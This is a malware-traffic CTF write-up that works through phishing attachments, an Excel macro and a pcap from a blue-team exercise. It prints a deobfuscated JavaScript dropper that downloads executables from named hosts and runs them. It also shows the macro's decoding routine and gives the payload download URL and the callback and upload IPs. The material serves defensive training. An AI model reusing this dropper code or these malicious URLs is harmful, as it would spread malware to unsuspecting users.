Malware traffic analysis 5
📅 Published: 2026-04-19 19:06 | 🔄 Last Updated: 2026-05-12 22:53
https://cyberdefenders.org/blueteam-ctf-challenges/malware-traffic-analysis-5/
Basic triage
| 10.3.66.103 [Strout-PC] [STROUT-PC] (Windows) | 148.251.80.172 | 148.251.80.172 [1.web-counter.info] |
|---|---|---|
| 109.68.191.31 | ||
| 174.121.246.162 | 174.121.246.162 [kennedy.sitoserver.com] | |
| 192.241.179.166 | 192.241.179.166 [3point5oz.com] | |
| 74.125.226.176 | 74.125.226.176 [www.google.com] | |
| 23.218.210.155 | 23.218.210.155 [e10088.dspb.akamaiedge.net] [www.microsoft.com-c.edgekey.net.globalredir.akadns.net] [www.microsoft.com] | |
| 10.3.66.1 | router |

Q1 c41-MTA5-email-01: What is the name of the malicious file?
Extract attachment in mail-01 reveals the malicious zip file
460630672421.exe
Q2 c41-MTA5-email-01: What is the name of the trojan family the malware belongs to? (As identified by emerging threats ruleset).
Calculate the hash and using open source threat intel:

UPATRE
Q3 c41-MTA5-email-02: Multiple streams contain macros in this document. Provide the number of the highest one.
Using Didier Stevens oledump
ubuntu@ip-172-31-17-146:~/Desktop/Start here/Tools/DidierStevensSuite$ python3 oledump.py '/home/ubuntu/Desktop/Start here/Artifacts/2- Bill Payment_000010818.xls'
/home/ubuntu/Desktop/Start here/Tools/DidierStevensSuite/oledump.py:188: SyntaxWarning: invalid escape sequence '\D'
manual = '''
1: 104 '\x01CompObj'
2: 236 '\x05DocumentSummaryInformation'
3: 216 '\x05SummaryInformation'
4: 13218 'Workbook'
5: 615 '_VBA_PROJECT_CUR/PROJECT'
6: 131 '_VBA_PROJECT_CUR/PROJECTwm'
7: M 24051 '_VBA_PROJECT_CUR/VBA/Module1'
8: M 25828 '_VBA_PROJECT_CUR/VBA/Module2'
9: 5853 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
10: 2278 '_VBA_PROJECT_CUR/VBA/__SRP_0'
11: 642 '_VBA_PROJECT_CUR/VBA/__SRP_1'
12: 1244 '_VBA_PROJECT_CUR/VBA/__SRP_2'
13: 264 '_VBA_PROJECT_CUR/VBA/__SRP_3'
14: 812 '_VBA_PROJECT_CUR/VBA/__SRP_4'
15: 204 '_VBA_PROJECT_CUR/VBA/__SRP_5'
16: 622 '_VBA_PROJECT_CUR/VBA/dir'
17: m 992 '_VBA_PROJECT_CUR/VBA/Лист1'
18: m 992 '_VBA_PROJECT_CUR/VBA/Лист2'
19: m 992 '_VBA_PROJECT_CUR/VBA/Лист3'
20: M 1458 '_VBA_PROJECT_CUR/VBA/ЭтаКнига'
The streams marked with the letter 'M' (Macros) contain malicious code: 7, 8, and 20.”
So the answer is 20
Next we use this command to extract and check those stream:
python3 oledump.py -s 7 -v
There are an obfuscate array in stream 8
valdis = Array(6340, 6352, 6352, 6348, 6294, 6283, 6283, 6333, 6336, 6354, 6333, 6346, 6335, 6337, 6336, 6339, 6350, 6347, 6353, 6348, 6282, 6346, 6337, 6352, 6282, 6333, 6353, 6283, 6362, 6341, 6346, 6335, 6333, 6346, 6352, 6341, 6346, 6283, 6287, 6287, 6288, 6339, 6289, 6342, 6291, 6290, 6283, 6292, 6293, 6291, 6341, 6291, 6353, 6356, 6349, 6337, 6282, 6337, 6356, 6337)
In ASCII code:
- h: 104
- t: 116
- p: 112
- : (colon) 58
- / (slash): 47
⇒ offset = 6340 - 104 = 6352-116= 6236
We can see the pattern: 6340, 6352, 6352, 6348, 6294, 6283, 6283 → http://
Deobfuscate using a simple python script
valdis = [
6340, 6352, 6352, 6348, 6294, 6283, 6283, 6333, 6336, 6354,
6333, 6346, 6335, 6337, 6336, 6339, 6350, 6347, 6353, 6348,
6282, 6346, 6337, 6352, 6282, 6333, 6353, 6283, 6362, 6341,
6346, 6335, 6333, 6346, 6352, 6341, 6346, 6283, 6287, 6287,
6288, 6339, 6289, 6342, 6291, 6290, 6283, 6292, 6293, 6291,
6341, 6291, 6353, 6356, 6349, 6337, 6282, 6337, 6356, 6337
]
result = ""
for num in valdis:
ch = chr(num - 6236)
result += ch
print(f"Result is: {result}")
Result is: http://advancedgroup.net.au/~incantin/334g5j76/897i7uxqe.exe
In stream 7 we also get:
Public Function Pochemu(Z() As Variant, oldLen As Integer) As String
Dim n As Integer
For n = LBound(Z) To UBound(Z)
Pochemu = Pochemu & Chr(Z(n) - 4 * oldLen - 6000)
Hacker chose oldLen = 59 ⇒ -59*4 - 6000 = - 6236. It’s the same offset as we deduced above
Q4 c41-MTA5-email-02: The Excel macro tried to download a file. Provide the full URL of this file?
As we already analyzed in Q3
http://advancedgroup.net.au/~incantin/334g5j76/897i7uxqe.exe
Q5 c41-MTA5-email-02: The Excel macro writes a file to the temp folder. Provide the filename?
Public Const zilibobe = "t”
hermando5 = string_ty_pe4(UCase(zilibobe) + "EMP")
This concatenates the strings to form the path to the TEMP folder
rudnik = Chr(Asc(UCase(zilibobe)) + 17)
So rudnik = "e".
ce_de_ge3 = hermando5 + Chr(Asc(zilibobe) - 24) + zilibobe + "gh" + zilibobe + "op" + "." + rudnik + "x" + rudnik

Asc("t"): 116.- 116 - 24 = 92.
- The 92th ASCII character is
\. - By substituting the ASCII values for the remaining characters, we get:
\+"t"+"gh"+"t"+"op"+.+"e"+"x"+"e".
tghtop.exe
Q6 c41-MTA5-email-03: Provide the FQDN used by the attacker to store the login credentials?
I calculate the hash and submit to hybrid-analysis.

The FQDN will be
jpmmotos.pt.
Q7 c41-MTA5-email-04: How many FQDNs are present in the malicious js?
I extracted the JavaScript file, and after beautifying the code (with the help of AI), it reveals a typical dropper script:
// The 'str' variable at the beginning acts as a Campaign ID or Bot ID
var str = '5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55';
// 1. Initialize the list of Domains (C2/Payload Servers)
var b = "kennedy.sitoserver.com nzvincem.cont.com abama.org".split(" ");
// 2. Initialize Windows COM Objects for system interaction
var ws = WScript.CreateObject("WScript.Shell"); // Used to execute files
var xo = WScript.CreateObject("MSXML2.XMLHTTP"); // Used to make HTTP GET requests to download files
var xa = WScript.CreateObject("ADODB.Stream"); // Used to write binary data streams to the hard drive
// 3. Define the storage location for the malicious file (%TEMP%\799755[n].exe)
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "799755";
var ld = 0;
// 4. Loop to download and execute the Payload
for (var n=1; n<=3; n++) {
for (var i=ld; i<b.length; i++) {
var dn = 0;
try {
// Send a request to download the payload, including the ID and a Random Number
xo.open("GET", "http://" + b[i] + "/counter/?id=" + str + "&rnd=309034" + n, false);
xo.send();
// Check HTTP Status Code
if (xo.status == 200) {
xa.open();
xa.type = 1; // 1 = adTypeBinary (Binary data)
xa.write(xo.responseBody);
// Check if file size > 1KB to avoid saving junk/error pages
if (xa.size > 1000) {
dn = 1;
xa.position = 0;
xa.saveToFile(fn + n + ".exe", 2); // 2 = Overwrite if the file already exists
try {
// Execute the Payload in the background
ws.Run(fn + n + ".exe", 1, 0);
} catch (er) { };
};
xa.close();
};
if (dn == 1) {
ld = i; // Mark which domain is alive to use for the next iteration
break;
};
} catch (er) { };
};
};
The answer is 3
Q8 c41-MTA5-email-04: What is the name of the object used to handle and read files?
As analyzed in Q7
ADODB.Stream
Q9 c41-MTA5.pcap: The victim received multiple emails; however, the user opened a single attachment. Provide the attachment filename.
Using networkminer, we can see the host with malicious domain related to the js file found in Q7

fax000497762.zip
Q10 c41-MTA5.pcap: What is the IP address of the victim machine?

10.3.66.103
Q11 c41-MTA5.pcap: What is the FQDN that hosted the malware?
kennedy.sitoserver.com
Q12 c41-MTA5.pcap: The opened attachment wrote multiple files to the TEMP folder. Provide the name of the first file written to the disk?
Take a look into the deobfuscated js code in Q7
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "799755";
xa.saveToFile(fn + n + ".exe", 2);
Since the variable n loops from 1 to 3, the first file written to disk will append '1' to the string, resulting in: 7997551.exe."
The first file written should be: 7997551.exe
Q13 c41-MTA5.pcap: One of the written files to the disk has the following md5 hash "35a09d67bee10c6aff48826717680c1c"; Which registry key does this malware check for its existence?
Locate the file in networkminer

use the strings command
interface{9a83a958-b859-11d1-aa90-00aa00ba3258}
Q14 c41-MTA5.pcap: One of the written files to the disk has the following md5 hash "e2fc96114e61288fc413118327c76d93" sent an HTTP post request to "upload.php" page. Provide the webserver IP. (IP is not in PCAP)
Similar to previous question

The incriminated file is the one transferred within packet n.571. Load it to Hybrid-Analysis and open the report under Falcon Sandbox Reports. Go to Network Analysis, then HTTP Traffic where you will find a POST request to the url 78.24.220.229/upload.php –
thus, the flag to submit is
78.24.220.229.
Q15 c41-MTA5.pcap: The malware initiated callback traffic after the infection. Provide the IP of the destination server.
During the basic triage phase, we already noticed 109.68.191.31 appearing as a prominent malicious IP, displaying a high volume of connections with the victim machine."
Dive deep into wireshark:



A encoded html with suspicious content
109.68.191.31
Didier Stevens suite
Malware analysis with oledump.py
- General scan:
python3 oledump.py <file_name> - Extract and decompress VBA:
oledump.py -s 8 -v <file>- (Note:
s 8selects stream 8,vperforms VBA decompression).
- (Note:
- Dump the malicious macro for analysis:
python oledump.py -s 8 -v suspicious_file.xls > macro_extracted.vba
PDF analysis with pdfid.py
It counts dangerous keywords within the PDF structure:
pdfid.py <file_name>- /JavaScript or /JS: Indicates the file contains embedded JavaScript code.
- /OpenAction or /AA (Additional Action): The file will automatically execute a specific action as soon as the victim opens it (frequently used in automatic or "Zero-click" attacks).
- /EmbeddedFiles: Indicates this PDF is hiding another file (possibly an
.exe) inside it.
Deep analysis with pdf-parser.py
python pdf-parser.py --search javascript thong_bao_thue.pdf- Purpose: Find the object containing the JavaScript.
python pdf-parser.py --object 12 thong_bao_thue.pdf- Purpose: Once the object (e.g., object 12) is found, extract it for analysis.
- To read the original code (since PDF data is often compressed using
FlateDecode):python pdf-parser.py --object 12 -f -w thong_bao_thue.pdff: Pass data through filters (decompresses the data).w: Raw output.
Hunting for encoded strings with base64dump.py
python base64dump.py macro_extracted.vba- Purpose: Find base64 strings within the file.
python base64dump.py -s 1 -a macro_extracted.vba- Purpose: Dump the decoded content of a specific string (e.g., string 1).